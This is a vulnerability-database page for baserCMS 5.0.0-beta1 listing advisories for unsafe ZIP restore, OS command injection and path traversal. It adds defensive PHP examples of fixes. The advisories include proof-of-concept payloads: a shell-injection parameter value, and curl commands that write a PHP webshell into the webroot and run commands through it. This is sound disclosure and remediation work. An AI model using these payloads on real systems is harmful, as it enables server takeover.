Look up vulnerable packages by Package URL.

Purl pkg:composer/baserproject/basercms@5.0.0-beta1
Type composer
Namespace baserproject
Name basercms
Version 5.0.0-beta1
Qualifiers
Subpath
Is_vulnerable true
Next_non_vulnerable_version 5.2.3
Latest_non_vulnerable_version 5.2.3
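How a client derives the summary above from a package record, as an added example (not VulnerableCode's or baserCMS's code): the JSON below is constructed to mirror the shape of this page, with made-up vulnerability IDs and aliases, and the code recomputes is_vulnerable and next_non_vulnerable_version from each entry's fixed_packages using PHP's version_compare(), which orders 5.0.0-beta1 before 5.0.0 and 5.2.3. It assumes a single release line, so a version at or above any listed fix counts as fixed.

```php
<?php
declare(strict_types=1);

// Added example, not VulnerableCode or baserCMS code. Sample record constructed
// to mirror the shape of this page; the vulnerability IDs, aliases and the
// second fix version are made up for the demonstration.
const SAMPLE_PACKAGE_JSON = <<<'JSON'
{
  "purl": "pkg:composer/baserproject/basercms@5.0.0-beta1",
  "affected_by_vulnerabilities": [
    {
      "vulnerability_id": "VCID-example-0001",
      "aliases": ["CVE-0000-0001"],
      "fixed_packages": [{"purl": "pkg:composer/baserproject/basercms@5.2.3"}]
    },
    {
      "vulnerability_id": "VCID-example-0002",
      "aliases": ["CVE-0000-0002"],
      "fixed_packages": [{"purl": "pkg:composer/baserproject/basercms@5.0.0"}]
    }
  ]
}
JSON;

/** Version component of a Package URL: the part after the last '@' of the core purl. */
function purlVersion(string $purl): ?string
{
    $core = preg_replace('/[?#].*$/s', '', $purl);   // drop qualifiers and subpath
    $at = strrpos($core, '@');
    return $at === false ? null : rawurldecode(substr($core, $at + 1));
}

/**
 * Lowest listed fix version that is newer than $installed, or null when
 * $installed already is (or exceeds) a fix version. Single release line assumed.
 */
function firstFixAbove(string $installed, array $fixedPurls): ?string
{
    $above = [];
    foreach ($fixedPurls as $purl) {
        $v = purlVersion($purl);
        if ($v !== null && version_compare($installed, $v, '<')) {
            $above[] = $v;
        }
    }
    if ($above === []) {
        return null;
    }
    usort($above, 'version_compare');
    return $above[0];
}

/** Recreates the is_vulnerable / next_non_vulnerable_version summary of a package record. */
function summarizePackage(string $json): array
{
    $record = json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    $installed = purlVersion($record['purl']);
    if ($installed === null) {
        throw new InvalidArgumentException('purl carries no version: ' . $record['purl']);
    }
    $hits = [];
    $nextFix = null;
    foreach ($record['affected_by_vulnerabilities'] as $vuln) {
        $fix = firstFixAbove($installed, array_column($vuln['fixed_packages'], 'purl'));
        if ($fix === null) {
            continue;                      // already at or past this vulnerability's fix
        }
        $hits[$vuln['vulnerability_id']] = ['aliases' => $vuln['aliases'], 'fixed_in' => $fix];
        // The first version clear of every hit is the highest of the per-vulnerability fixes.
        if ($nextFix === null || version_compare($fix, $nextFix, '>')) {
            $nextFix = $fix;
        }
    }
    return [
        'version'                     => $installed,
        'is_vulnerable'               => $hits !== [],
        'next_non_vulnerable_version' => $nextFix,
        'affected_by'                 => $hits,
    ];
}

print_r(summarizePackage(SAMPLE_PACKAGE_JSON));
```

version_compare() ranks pre-release suffixes below the bare release (5.0.0-beta1 < 5.0.0 < 5.2.3), which is why the beta on this page counts as affected by a fix landing in 5.2.3. A real client would take the record from the VulnerableCode API rather than an embedded string, and should not collapse several maintained release branches into one line the way this helper does.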
Affected_by_vulnerabilities
0
url VCID-3new-f12y-8bf9
vulnerability_id VCID-3new-f12y-8bf9
summary
baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)
### Details
The application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.

Vector: Malicious ZIP upload + insecure `require_once`

### PoC
1. Restore backup
   ![image](https://github.com/user-attachments/assets/9e59768a-4a8e-472d-aaef-5d54546080f6)
2. Load file shell (insecure `require_once`)
   ![image](https://github.com/user-attachments/assets/8f7919a2-c7f3-4ae1-af6c-1b0057e4ba22)
   ![image](https://github.com/user-attachments/assets/c10ef049-459d-429e-a608-8fb220c3387f)

### Impact
Remote Code Execution (RCE)
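The safe counterpart to the restore flow described above, as an added example (not baserCMS code): the archive is unpacked with an allowlist of data extensions, every entry name is checked for absolute paths and `..` segments, declared sizes are capped, and nothing that came out of the archive is ever passed to `require_once` or `include`. The class name, the extension list and the size limits are assumptions chosen for the example.

```php
<?php
declare(strict_types=1);

/**
 * Added example, not baserCMS code. Unpacks a backup archive without ever
 * letting its contents reach the PHP interpreter: an entry is written only if
 * it is a regular file, carries an allowlisted data extension, and its name
 * cannot leave $destDir. The restore logic then reads those data files; it
 * never include()s or require()s anything that came out of the archive.
 */
final class SafeBackupRestore
{
    /** Data formats a backup may contain; php, phtml, phar, htaccess ... are simply absent. */
    private const ALLOWED_EXT = ['sql', 'csv', 'json', 'txt'];
    private const MAX_ENTRIES = 10000;
    private const MAX_TOTAL_BYTES = 256 * 1024 * 1024;   // sum of declared sizes; zip-bomb guard

    /** @return string[] absolute paths of the files written */
    public static function extract(string $zipPath, string $destDir): array
    {
        $base = realpath($destDir);
        if ($base === false || !is_dir($base)) {
            throw new RuntimeException("destination is not a directory: $destDir");
        }
        $zip = new ZipArchive();
        if ($zip->open($zipPath) !== true) {
            throw new RuntimeException("cannot open archive: $zipPath");
        }
        if ($zip->numFiles > self::MAX_ENTRIES) {
            throw new RuntimeException('archive has too many entries');
        }
        $written = [];
        $total = 0;
        for ($i = 0; $i < $zip->numFiles; $i++) {
            $name = $zip->getNameIndex($i);
            $stat = $zip->statIndex($i);
            if ($name === false || $stat === false || substr($name, -1) === '/') {
                continue;                              // directory entry: created on demand below
            }
            self::assertSafeEntryName($name);
            $total += $stat['size'];
            if ($total > self::MAX_TOTAL_BYTES) {
                throw new RuntimeException('archive exceeds the size budget');
            }
            $target = $base . DIRECTORY_SEPARATOR . str_replace('/', DIRECTORY_SEPARATOR, $name);
            $dir = dirname($target);
            if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
                throw new RuntimeException("cannot create $dir");
            }
            // Read the entry's bytes and write a regular file; file_put_contents never
            // creates a symlink, so link entries cannot redirect the write elsewhere.
            $data = $zip->getFromIndex($i);
            if ($data === false || file_put_contents($target, $data) === false) {
                throw new RuntimeException("cannot write $name");
            }
            $written[] = $target;
        }
        $zip->close();
        return $written;
    }

    /** Accept only relative, traversal-free names ending in an allowlisted extension. */
    private static function assertSafeEntryName(string $name): void
    {
        $unix = str_replace('\\', '/', $name);
        if ($unix === '' || $unix[0] === '/' || preg_match('/^[A-Za-z]:/', $unix)
            || strpos($unix, "\0") !== false) {
            throw new RuntimeException("rejected entry name: $name");
        }
        foreach (explode('/', $unix) as $segment) {
            if ($segment === '' || $segment === '.' || $segment === '..') {
                throw new RuntimeException("rejected entry name: $name");
            }
        }
        $ext = strtolower(pathinfo($unix, PATHINFO_EXTENSION));
        if (!in_array($ext, self::ALLOWED_EXT, true)) {
            throw new RuntimeException("disallowed file type in backup: $name");
        }
    }
}

// Usage: $files = SafeBackupRestore::extract('/tmp/upload.zip', '/var/lib/basercms/restore');
```

The extraction directory must sit outside the document root: the allowlist only inspects the last extension, and a web server configured to pick handlers from any extension in the name would still execute a file called `x.php.sql` if it were reachable over HTTP.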
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
reference_id
reference_type
scores
0
value 0.00031
scoring_system epss
scoring_elements 0.09459
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
6
reference_url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
reference_id GHSA-hv78-cwp4-8r7r
reference_type
scores
url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2025-32957, GHSA-hv78-cwp4-8r7r
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9
1
url VCID-4zw8-truk-pugf
vulnerability_id VCID-4zw8-truk-pugf
summary
baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)
## Summary

In the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.

This vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.

---

## Vulnerability Information

| Item | Details |
| ---- | ------- |
| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |
| Impact | Remote Code Execution (RCE) |
| Severity | Critical |
| Attack Requirements | Administrator privileges required |
| Reproducibility | Reproducible (confirmed multiple times) |
| Test Environment | baserCMS 5.2.2 (Docker / development environment) |

---

## Affected Areas

- **Controller**
  - `PluginsController::get_core_update()`
- **Service**
  - `PluginsService::getCoreUpdate()`
- **Affected Endpoint**
  - `/baser/admin/baser-core/plugins/get_core_update`

---

## Technical Details

### Vulnerable Code Flow

```text
PluginsController::get_core_update()
  ↓ Retrieves php parameter from POST data
PluginsService::getCoreUpdate($targetVersion, $php, $force)
  ↓ Concatenates $php into command string without validation or escaping
exec($command)
```

### Relevant Code (Excerpt)

**PluginsController.php**

```php
$service->getCoreUpdate(
    $request->getData('targetVersion') ?? '',
    $request->getData('php') ?? 'php',
    $request->getData('force'),
);
```

**PluginsService.php**

```php
$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .
           $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';

exec($command, $out, $code);
```

The `$php` parameter is user input, and **none** of the following countermeasures are in place:

- Restriction via allowlist
- Validation via regular expression
- Escaping via `escapeshellarg()` or similar

---

## Attack Scenario

1. The attacker logs in as a CMS administrator
2. Sends a POST request to the core update functionality in the admin panel
3. Specifies a string containing OS commands in the `php` parameter
4. `exec()` is executed on the server side, running the arbitrary OS command

### Example Attack Input (Conceptual)

```text
php=php;id>/tmp/rce_test;#
```

---

## Verification Results (PoC)

### Execution Result

```bash
$ docker exec bc-php cat /tmp/rce_test
uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)
```

The above confirms that OS commands can be executed with `www-data` privileges.

### Additional Notes

- Reproducible through the legitimate flow in the admin panel (browser)
- Succeeds even with CSRF/FormProtection tokens included in a legitimate request
- Failure cases (400/403) have also been investigated and differentiated
- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)

---

## Impact

If this vulnerability is exploited, the following becomes possible:

- Retrieval of server information
- Reading/writing arbitrary files
- Retrieval of application configuration information (DB credentials, etc.)
- OS-level operations beyond application permission boundaries

Although administrator privileges are required, **this is a design issue where the impact extends from the application layer to the OS layer**, and the impact is considered significant.

---

## Recommended Fix

### Primary Recommendation

- Do not accept the PHP executable path from user input
- Fix the PHP executable on the server side using the `PHP_BINARY` constant

```php
$php = escapeshellarg(PHP_BINARY);
```

### Supplementary Fix Recommendations

- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well
- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)

### Alternative (Not Recommended)

- Allowlist validation for the PHP executable path
- Combined use of regex validation and `escapeshellarg()`

However, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.
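The vulnerable concatenation beside its hardened form, as an added example (not baserCMS code) covering the attack scenario and the fix recommendations above: the interpreter is pinned to `PHP_BINARY`, the version is allowlisted by regex, and the process is started from an argv array via `proc_open()`, which on PHP 7.4 and later executes the program directly without a shell. `ROOT`, `DS` and `TMP` are baserCMS constants stubbed here with assumed values; `runArgv()` is shown but only meaningful against a real checkout.

```php
<?php
declare(strict_types=1);

// Added example, not baserCMS code. The vulnerable function mirrors the
// advisory's excerpt; the hardened pair replaces it. ROOT, DS and TMP are
// baserCMS constants, stubbed here so the file runs stand-alone.
defined('DS')   || define('DS', DIRECTORY_SEPARATOR);
defined('ROOT') || define('ROOT', sys_get_temp_dir() . DS . 'basercms-example');
defined('TMP')  || define('TMP', ROOT . DS . 'tmp' . DS);

/** Vulnerable shape (from the advisory): $php arrives straight from the POST body. */
function buildVulnerableCommand(string $targetVersion, string $php): string
{
    return $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .
           $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';
}

/**
 * Hardened replacement: returns an argv array, none of which is shell-interpreted.
 * @throws InvalidArgumentException when $targetVersion is not a release tag
 */
function buildCoreUpdateArgv(string $targetVersion): array
{
    // Allowlist: a Composer-style version such as 5.2.3 or 5.3.0-beta1. Anything
    // else (spaces, ';', '$', newlines) is rejected before it reaches the OS.
    if (!preg_match('/\A\d+\.\d+\.\d+(?:-[A-Za-z0-9.]+)?\z/', $targetVersion)) {
        throw new InvalidArgumentException("invalid target version: $targetVersion");
    }
    $php = PHP_BINARY;                  // fixed server-side, never taken from the request
    return [
        $php, ROOT . DS . 'bin' . DS . 'cake.php', 'composer', $targetVersion,
        '--php', $php, '--dir', TMP . 'update',
    ];
}

/**
 * Runs an argv array without a shell. proc_open() accepts an array command on
 * PHP 7.4+ and execs it directly; on older PHP, escapeshellarg() each element
 * and join with spaces instead.
 */
function runArgv(array $argv): array
{
    $proc = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('failed to start ' . $argv[0]);
    }
    $out = stream_get_contents($pipes[1]);
    $err = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    return ['code' => proc_close($proc), 'out' => $out, 'err' => $err];
}

// The advisory's conceptual payload against both shapes.
$payload = 'php;id>/tmp/rce_test;#';
echo buildVulnerableCommand('5.2.3', $payload), PHP_EOL;   // a shell would run `id` here
try {
    buildCoreUpdateArgv($payload);      // $php is no longer an input; even as a
} catch (InvalidArgumentException $e) { // version string the payload is rejected
    echo $e->getMessage(), PHP_EOL;
}
// A legitimate call; running runArgv() on it needs a real baserCMS checkout under ROOT.
print_r(buildCoreUpdateArgv('5.2.3'));
```

The array form matters independently of the regex: with `proc_open([...])` the version string is delivered to `cake.php` as one argv element, so even a character the regex missed would be data, not shell syntax.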

---

## Additional Notes

- This issue is independent of UI display controls (showing/hiding buttons)
- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed
- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone

---

## Conclusion

Due to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
reference_id
reference_type
scores
0
value 0.00131
scoring_system epss
scoring_elements 0.32198
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
6
reference_url https://github.com/advisories/GHSA-qxmc-6f24-g86g
reference_id GHSA-qxmc-6f24-g86g
reference_type
scores
url https://github.com/advisories/GHSA-qxmc-6f24-g86g
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-21861, GHSA-qxmc-6f24-g86g
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf
2
url VCID-7x3n-4c2b-nfbx
vulnerability_id VCID-7x3n-4c2b-nfbx
summary
baserCMS has OS command injection vulnerability in installer
baserCMS has an OS command injection vulnerability in the installer.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

If baserCMS has been deployed on a server but the installation has not been completed, the still-exposed installer can be used to execute malicious commands.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information:
https://basercms.net/security/JVN_54513170

### Credits

REN XINGDIAN
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
reference_id
reference_type
scores
0
value 0.00055
scoring_system epss
scoring_elements 0.17526
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
6
reference_url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
reference_id GHSA-6hpg-8rx3-cwgv
reference_type
scores
url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30880, GHSA-6hpg-8rx3-cwgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx
3
url VCID-8buz-nsr9-3yge
vulnerability_id VCID-8buz-nsr9-3yge
summary
baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API
## Summary

A path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.

An authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).

## Affected Code

**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`

```php
public function getFullpath(string $theme, string $plugin, string $type, string $path)
{
    // ...
    return $viewPath . $type . DS . $path;  // $path is not sanitized
}
```

## Attack Scenario

1. The attacker compromises an administrator account (password leak, brute force, etc.)
2. Obtains an access token via API login
3. Specifies `path: "../../../../webroot/"` in the theme file creation API
4. A PHP file is created in the webroot
5. The attacker accesses the created PHP file to achieve RCE

## Reproduction Steps

```bash
# 1. Login
curl -X POST "http://target/baser/api/admin/baser-core/users/login.json" \
  -H "Content-Type: application/json" \
  -d '{"email":"admin@example.com","password":"password"}'

# 2. Create webshell
curl -X POST "http://target/baser/api/admin/bc-theme-file/theme_files/add.json" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{
    "theme": "BcThemeSample",
    "plugin": "",
    "type": "layout",
    "path": "../../../../webroot/",
    "base_name": "shell",
    "ext": "php",
    "contents": "<?php system($_GET[\"cmd\"]); ?>"
  }'

# 3. RCE
curl "http://target/shell.php?cmd=id"
```

## Vulnerability Details

| Item | Details |
|------|---------|
| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |
| Impact | Arbitrary file write, Remote Code Execution (RCE) |
| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |
| Reproducibility | High (PoC verified) |
| Test Environment | baserCMS 5.x (Docker environment) |

### Additional Notes on Attack Prerequisites

- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.
- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.

## Recommended Fix

Rather than relying on string replacement or denylist checks on the input, the canonicalized target path (via `realpath()` or similar) should be verified to lie within the theme base directory immediately before the file is written, and the operation rejected if the path falls outside that boundary. Note that `realpath()` returns `false` for a file that does not exist yet, so the check must canonicalize the target's parent directory rather than the file itself.

The specific implementation location and method are left to the project's design decisions.
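One way to implement that check, as an added example (not baserCMS code): the candidate directory is canonicalized with `realpath()`, which resolves both `..` segments and symlinks, and then tested against the theme base with a trailing separator so that a sibling directory sharing the prefix is not accepted. `$viewPath` stands in for the directory baserCMS derives from `$theme`/`$plugin`; the `$type` allowlist and the temporary demo tree are assumptions made for the example.

```php
<?php
declare(strict_types=1);

/**
 * Added example, not baserCMS code. Resolves the destination of a theme-file
 * write the way the advisory recommends: build the candidate path, canonicalise
 * it, and refuse anything that does not stay under the theme's base directory.
 * realpath() returns false for a file that does not exist yet, so the parent
 * directory is canonicalised and the bare file name re-attached afterwards.
 * $viewPath stands in for the directory baserCMS derives from $theme/$plugin;
 * the $type allowlist is illustrative, not the project's actual list.
 */
function safeThemeFilePath(string $viewPath, string $type, string $path, string $fileName): string
{
    $base = realpath($viewPath);
    if ($base === false) {
        throw new RuntimeException("theme directory missing: $viewPath");
    }
    foreach ([$type, $path, $fileName] as $component) {
        if (strpos($component, "\0") !== false) {
            throw new InvalidArgumentException('NUL byte in path component');
        }
    }
    if (!in_array($type, ['layout', 'element', 'css', 'js'], true)) {
        throw new InvalidArgumentException("unknown type: $type");
    }
    // The file name must be a single segment; basename('..') is '..', so test it explicitly.
    if ($fileName === '' || $fileName === '.' || $fileName === '..' || $fileName !== basename($fileName)) {
        throw new InvalidArgumentException("invalid file name: $fileName");
    }

    $dir = $base . DIRECTORY_SEPARATOR . $type;
    if ($path !== '') {
        $dir .= DIRECTORY_SEPARATOR . $path;       // untrusted: may contain ../ or symlink names
    }
    $parent = realpath($dir);                      // resolves ../ and symlinks alike
    if ($parent === false) {
        throw new InvalidArgumentException("target directory does not exist: $path");
    }
    // Prefix test with the separator appended: "/themes/foo" must not accept
    // "/themes/foobar/x", a sibling that merely shares the string prefix.
    $boundary = $base . DIRECTORY_SEPARATOR;
    if (strncmp($parent . DIRECTORY_SEPARATOR, $boundary, strlen($boundary)) !== 0) {
        throw new InvalidArgumentException("path escapes the theme directory: $path");
    }
    return $parent . DIRECTORY_SEPARATOR . $fileName;
}

// Demo on a throwaway tree, constructed here so the file runs anywhere.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'theme-demo-' . getmypid();
mkdir("$root/theme/layout", 0750, true);
mkdir("$root/webroot", 0750, true);

echo safeThemeFilePath("$root/theme", 'layout', '', 'default.php'), PHP_EOL;   // accepted
foreach (['../../webroot/', '../../../../webroot/'] as $attempt) {
    try {
        safeThemeFilePath("$root/theme", 'layout', $attempt, 'shell.php');
        echo "accepted: $attempt", PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;   // both attempts land here
    }
}

rmdir("$root/webroot");
rmdir("$root/theme/layout");
rmdir("$root/theme");
rmdir($root);
```

The first traversal resolves to an existing directory outside the base and fails the boundary test; the second points at a directory that does not exist and fails canonicalization. Both outcomes are rejections, which is the point: the write proceeds only when the resolved parent is provably inside the theme.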

## Comparison with Other CMS

WordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. [CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.

This vulnerability is not a matter of "administrators being able to execute arbitrary code" by design, but rather stems from a security boundary violation where "the theme editing function can write outside the theme directory (to webroot, config, etc.)."

## Resources

